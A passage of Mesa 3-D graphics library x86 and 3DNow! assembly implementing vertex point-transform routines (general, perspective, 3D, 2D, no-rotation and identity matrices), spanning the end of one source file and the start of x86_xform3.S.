 * Sets dest->size = 3 and ORs VEC_SIZE_3 into dest->flags; copies the
 * count; honours the source stride.  3DNow! code; ends with FEMMS.
 * Clobbers EAX, ECX, EDX, MM0-MM4, MM7, EFLAGS.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_3d )
HIDDEN(_mesa_3dnow_transform_points3_3d)
GLNAME( _mesa_3dnow_transform_points3_3d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3R_2 ) )
PREFETCH ( REGIND(EAX) )
PREFETCH ( REGIND(EDX) )
MOVD ( REGOFF(8, ECX), MM7 ) /* | m2 */
PUNPCKLDQ ( REGOFF(24, ECX), MM7 ) /* m6 | m2 */
ALIGNTEXT16
LLBL( G3TP3R_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM1 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
MOVQ ( MM0, MM2 ) /* x1 | x0 */
ADD_L ( CONST(16), EDX ) /* next r */
PUNPCKLDQ ( MM2, MM2 ) /* x0 | x0 */
MOVQ ( MM0, MM3 ) /* x1 | x0 */
PFMUL ( REGIND(ECX), MM2 ) /* x0*m1 | x0*m0 */
PUNPCKHDQ ( MM3, MM3 ) /* x1 | x1 */
MOVQ ( MM1, MM4 ) /* | x2 */
PFMUL ( REGOFF(16, ECX), MM3 ) /* x1*m5 | x1*m4 */
PUNPCKLDQ ( MM4, MM4 ) /* x2 | x2 */
PFADD ( MM2, MM3 ) /* x0*m1+x1*m5 | x0*m0+x1*m4 */
PFMUL ( REGOFF(32, ECX), MM4 ) /* x2*m9 | x2*m8 */
PFADD ( REGOFF(48, ECX), MM3 ) /* x0*m1+...+m11 | x0*m0+x1*m4+m12 */
PFMUL ( MM7, MM0 ) /* x1*m6 | x0*m2 */
PFADD ( MM4, MM3 ) /* r1 | r0 */
PFMUL ( REGOFF(40, ECX), MM1 ) /* | x2*m10 */
PUNPCKLDQ ( REGOFF(56, ECX), MM1 ) /* m14 | x2*m10 */
PFACC ( MM0, MM1 )
MOVQ ( MM3, REGOFF(-16, EDX) ) /* write r0, r1 */
PFACC ( MM1, MM1 ) /* | r2 */
MOVD ( MM1, REGOFF(-8, EDX) ) /* write r2 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3R_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3R_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points3_3d_no_rot(dest, matrix, source)
 *
 * Scale-plus-translation transform (no rotation terms):
 * r0 = x0*m00 + m30, r1 = x1*m11 + m31, r2 = x2*m22 + m32, reading
 * only the matrix entries at byte offsets 0, 20, 40, 48/52 and 56.
 * Sets dest->size = 3 and ORs VEC_SIZE_3 into dest->flags; copies the
 * count; honours the source stride.  3DNow! code; ends with FEMMS.
 * Clobbers EAX, ECX, EDX, MM0-MM5, EFLAGS.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_3d_no_rot )
HIDDEN(_mesa_3dnow_transform_points3_3d_no_rot)
GLNAME( _mesa_3dnow_transform_points3_3d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3NRR_2 ) )
PREFETCH ( REGIND(EAX) )
PREFETCHW ( REGIND(EDX) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVD ( REGOFF(40, ECX), MM2 ) /* | m22 */
PUNPCKLDQ ( MM2, MM2 ) /* m22 | m22 */
MOVQ ( REGOFF(48, ECX), MM1 ) /* m31 | m30 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
PUNPCKLDQ ( MM3, MM3 ) /* m32 | m32 */
ALIGNTEXT16
LLBL( G3TP3NRR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM5 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCHW ( REGIND(EAX) )
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PFADD ( MM1, MM4 ) /* x1*m11+m31 | x0*m00+m30 */
PFMUL ( MM2, MM5 ) /* | x2*m22 */
PFADD ( MM3, MM5 ) /* | x2*m22+m32 */
MOVQ ( MM4, REGIND(EDX) ) /* write r0, r1 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
MOVD ( MM5, REGOFF(-8, EDX) ) /* write r2 */
JNZ ( LLBL( G3TP3NRR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3NRR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points3_2d(dest, matrix, source)
 *
 * 2D transform with rotation: r0/r1 are the 2x2 product of (x0,x1)
 * with m00/m01/m10/m11 plus the translation pair m30/m31; r2 passes
 * x2 through unchanged.  Sets dest->size = 3 and ORs VEC_SIZE_3 into
 * dest->flags; copies the count; honours the source stride.  3DNow!
 * code; ends with FEMMS.  Clobbers EAX, ECX, EDX, MM0-MM5, EFLAGS.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_2d )
HIDDEN(_mesa_3dnow_transform_points3_2d)
GLNAME( _mesa_3dnow_transform_points3_2d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2R_3) )
PREFETCH ( REGIND(EAX) )
PREFETCHW ( REGIND(EDX) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(16, ECX), MM0 ) /* m10 | m00 */
MOVD ( REGOFF(4, ECX), MM1 ) /* | m01 */
PUNPCKLDQ ( REGOFF(20, ECX), MM1 ) /* m11 | m01 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2R_2 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM3 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM5 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
MOVQ ( MM3, MM4 ) /* x1 | x0 */
PFMUL ( MM0, MM3 ) /* x1*m10 | x0*m00 */
ADD_L ( CONST(16), EDX ) /* next r */
PFMUL ( MM1, MM4 ) /* x1*m11 | x0*m01 */
PFACC ( MM4, MM3 ) /* x0*m00+x1*m10 | x0*m01+x1*m11 */
MOVD ( MM5, REGOFF(-8, EDX) ) /* write r2 (=x2) */
PFADD ( MM2, MM3 ) /* x0*...*m10+m30 | x0*...*m11+m31 */
MOVQ ( MM3, REGOFF(-16, EDX) ) /* write r0, r1 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2R_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2R_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points3_2d_no_rot(dest, matrix, source)
 *
 * 2D scale-plus-translation transform: r0 = x0*m00 + m30,
 * r1 = x1*m11 + m31, r2 passes x2 through unchanged; reads only the
 * matrix entries at byte offsets 0, 20 and 48/52.  Sets
 * dest->size = 3 and ORs VEC_SIZE_3 into dest->flags; copies the
 * count; honours the source stride.  3DNow! code; ends with FEMMS.
 * Clobbers EAX, ECX, EDX, MM0, MM1, MM4, MM5, EFLAGS.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_2d_no_rot )
HIDDEN(_mesa_3dnow_transform_points3_2d_no_rot)
GLNAME( _mesa_3dnow_transform_points3_2d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2NRR_2 ) )
PREFETCH ( REGIND(EAX) )
PREFETCHW ( REGIND(EDX) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVQ ( REGOFF(48, ECX), MM1 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2NRR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM5 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
ADD_L ( CONST(16), EDX ) /* next r */
PFADD ( MM1, MM4 ) /* x1*m11+m31 | x0*m00+m30 */
MOVQ ( MM4, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVD ( MM5, REGOFF(-8, EDX) ) /* write r2 (=x2) */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2NRR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2NRR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*
 * _mesa_3dnow_transform_points3_identity(dest, matrix, source)
 *
 * Identity transform: copies each 3-component source point into the
 * 16-byte-stride destination unchanged (the matrix argument is loaded
 * but its contents are never read).  Sets dest->size = 3 and ORs
 * VEC_SIZE_3 into dest->flags; copies the count; honours the source
 * stride.  Uses MMX registers for the copy; ends with FEMMS.
 * Clobbers EAX, ECX, EDX, MM0, MM1, EFLAGS.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_identity )
HIDDEN(_mesa_3dnow_transform_points3_identity)
GLNAME( _mesa_3dnow_transform_points3_identity ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPIR_2 ) )
PREFETCHW ( REGIND(EDX) )
ALIGNTEXT16
LLBL( G3TPIR_1 ):
PREFETCHW ( REGOFF(32, EDX) )
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM1 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
MOVQ ( MM0, REGOFF(-16, EDX) ) /* r1 | r0 */
MOVD ( MM1, REGOFF(-8, EDX) ) /* | r2 */
JNZ ( LLBL( G3TPIR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPIR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 13,763
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/x86_xform3.S
|
/* $Id: x86_xform3.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* NOTE: Avoid using spaces in between '(' ')' and arguments, especially
* with macros like CONST, LLBL that expand to CONCAT(...). Putting spaces
* in there will break the build on some platforms.
*/
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FP_ONE 1065353216
#define FP_ZERO 0
#define SRC0 REGOFF(0, ESI)
#define SRC1 REGOFF(4, ESI)
#define SRC2 REGOFF(8, ESI)
#define SRC3 REGOFF(12, ESI)
#define DST0 REGOFF(0, EDI)
#define DST1 REGOFF(4, EDI)
#define DST2 REGOFF(8, EDI)
#define DST3 REGOFF(12, EDI)
#define MAT0 REGOFF(0, EDX)
#define MAT1 REGOFF(4, EDX)
#define MAT2 REGOFF(8, EDX)
#define MAT3 REGOFF(12, EDX)
#define MAT4 REGOFF(16, EDX)
#define MAT5 REGOFF(20, EDX)
#define MAT6 REGOFF(24, EDX)
#define MAT7 REGOFF(28, EDX)
#define MAT8 REGOFF(32, EDX)
#define MAT9 REGOFF(36, EDX)
#define MAT10 REGOFF(40, EDX)
#define MAT11 REGOFF(44, EDX)
#define MAT12 REGOFF(48, EDX)
#define MAT13 REGOFF(52, EDX)
#define MAT14 REGOFF(56, EDX)
#define MAT15 REGOFF(60, EDX)
ALIGNTEXT16
/*
 * _mesa_x86_transform_points3_general:
 * transform 3-component points by a full 4x4 matrix (x87 FPU), writing
 * 4-component results (x,y,z,w).  Argument layout per the ARG_* macros
 * from xform_args.h (not visible here).
 * Register roles: ESI = src point, EDI = dest point, EDX = matrix base,
 * EAX = src stride (bytes), ECX = dest end pointer (loop sentinel).
 * The F0..F7 comments trace the x87 stack contents, top-of-stack first.
 */
GLOBL GLNAME( _mesa_x86_transform_points3_general )
HIDDEN(_mesa_x86_transform_points3_general)
GLNAME( _mesa_x86_transform_points3_general ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX ) /* count == 0 -> done */
JZ( LLBL(x86_p3_gr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX ) /* count * 16 bytes per dest point */
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX ) /* ECX = one past last dest point */
ALIGNTEXT16
LLBL(x86_p3_gr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC0 ) /* F7 F6 F5 F4 */
FMUL_S( MAT3 )
FLD_S( SRC1 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT6 )
FLD_S( SRC1 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT7 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
FLD_S( SRC2 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT10 )
FLD_S( SRC2 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT11 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
/* add the translation row (m12..m15) to each accumulated component */
FXCH( ST(3) ) /* F4 F6 F5 F7 */
FADD_S( MAT12 )
FXCH( ST(2) ) /* F5 F6 F4 F7 */
FADD_S( MAT13 )
FXCH( ST(1) ) /* F6 F5 F4 F7 */
FADD_S( MAT14 )
FXCH( ST(3) ) /* F7 F5 F4 F6 */
FADD_S( MAT15 )
FXCH( ST(2) ) /* F4 F5 F7 F6 */
FSTP_S( DST0 ) /* F5 F7 F6 */
FSTP_S( DST1 ) /* F7 F6 */
FXCH( ST(1) ) /* F6 F7 */
FSTP_S( DST2 ) /* F7 */
FSTP_S( DST3 ) /* */
LLBL(x86_p3_gr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_gr_loop) )
LLBL(x86_p3_gr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
/*
 * _mesa_x86_transform_points3_perspective:
 * transform 3-component points by a perspective-projection-shaped matrix:
 * only m0, m5, m8, m9, m10, m14 are read.  Output w is -z, produced by
 * flipping the sign bit of the source z with an integer XOR (0x80000000)
 * in EBX -- no FPU round trip needed for that component.
 * Register roles: ESI = src, EDI = dest, EDX = matrix, EAX = src stride,
 * ECX = dest end pointer, EBX = integer scratch for -z.
 */
GLOBL GLNAME( _mesa_x86_transform_points3_perspective )
HIDDEN(_mesa_x86_transform_points3_perspective)
GLNAME( _mesa_x86_transform_points3_perspective ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX ) /* count == 0 -> done */
JZ( LLBL(x86_p3_pr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX ) /* count * 16 bytes per dest point */
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p3_pr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC2 ) /* F0 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F2 F1 F0 F5 F4 */
FMUL_S( MAT10 )
FXCH( ST(2) ) /* F0 F1 F2 F5 F4 */
FADDP( ST0, ST(4) ) /* F1 F2 F5 F4 */
FADDP( ST0, ST(2) ) /* F2 F5 F4 */
FLD_S( MAT14 ) /* F6 F2 F5 F4 */
FXCH( ST(1) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
MOV_L( SRC2, EBX ) /* w = -z via integer sign-bit flip */
XOR_L( CONST(-2147483648), EBX )/* change sign */
FXCH( ST(2) ) /* F4 F5 F6 */
FSTP_S( DST0 ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
MOV_L( EBX, DST3 )
LLBL(x86_p3_pr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_pr_loop) )
LLBL(x86_p3_pr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
/*
 * _mesa_x86_transform_points3_3d:
 * transform 3-component points by a 3D (affine) matrix: the 3x3 rotation
 * part (m0..m2, m4..m6, m8..m10) plus translation (m12..m14).  Produces
 * 3-component results; the last matrix column is not read.
 * Register roles: ESI = src, EDI = dest, EDX = matrix, EAX = src stride,
 * ECX = dest end pointer.  Stack-trace comments as in the general case.
 */
GLOBL GLNAME( _mesa_x86_transform_points3_3d )
HIDDEN(_mesa_x86_transform_points3_3d)
GLNAME( _mesa_x86_transform_points3_3d ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX ) /* count == 0 -> done */
JZ( LLBL(x86_p3_3dr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX ) /* count * 16 bytes per dest point */
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p3_3dr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC1 ) /* F0 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT6 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
FLD_S( SRC2 ) /* F0 F6 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT10 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
/* add the translation vector (m12..m14) */
FXCH( ST(2) ) /* F4 F5 F6 */
FADD_S( MAT12 )
FXCH( ST(1) ) /* F5 F4 F6 */
FADD_S( MAT13 )
FXCH( ST(2) ) /* F6 F4 F5 */
FADD_S( MAT14 )
FXCH( ST(1) ) /* F4 F6 F5 */
FSTP_S( DST0 ) /* F6 F5 */
FXCH( ST(1) ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
LLBL(x86_p3_3dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p3_3dr_loop) )
LLBL(x86_p3_3dr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
/*
 * _mesa_x86_transform_points3_3d_no_rot:
 * transform 3-component points by a scale+translate matrix (no rotation):
 * reads only the diagonal m0, m5, m10 and the translation m12..m14.
 * r = (x*m0 + m12, y*m5 + m13, z*m10 + m14).
 * Register roles: ESI = src, EDI = dest, EDX = matrix, EAX = src stride,
 * ECX = dest end pointer.
 */
GLOBL GLNAME( _mesa_x86_transform_points3_3d_no_rot )
HIDDEN(_mesa_x86_transform_points3_3d_no_rot)
GLNAME( _mesa_x86_transform_points3_3d_no_rot ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX ) /* count == 0 -> done */
JZ( LLBL(x86_p3_3dnrr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX ) /* count * 16 bytes per dest point */
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p3_3dnrr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F1 F4 */
FMUL_S( MAT5 )
FLD_S( SRC2 ) /* F2 F1 F4 */
FMUL_S( MAT10 )
FXCH( ST(2) ) /* F4 F1 F2 */
FADD_S( MAT12 )
FLD_S( MAT13 ) /* F5 F4 F1 F2 */
FXCH( ST(2) ) /* F1 F4 F5 F2 */
FADDP( ST0, ST(2) ) /* F4 F5 F2 */
FLD_S( MAT14 ) /* F6 F4 F5 F2 */
FXCH( ST(3) ) /* F2 F4 F5 F6 */
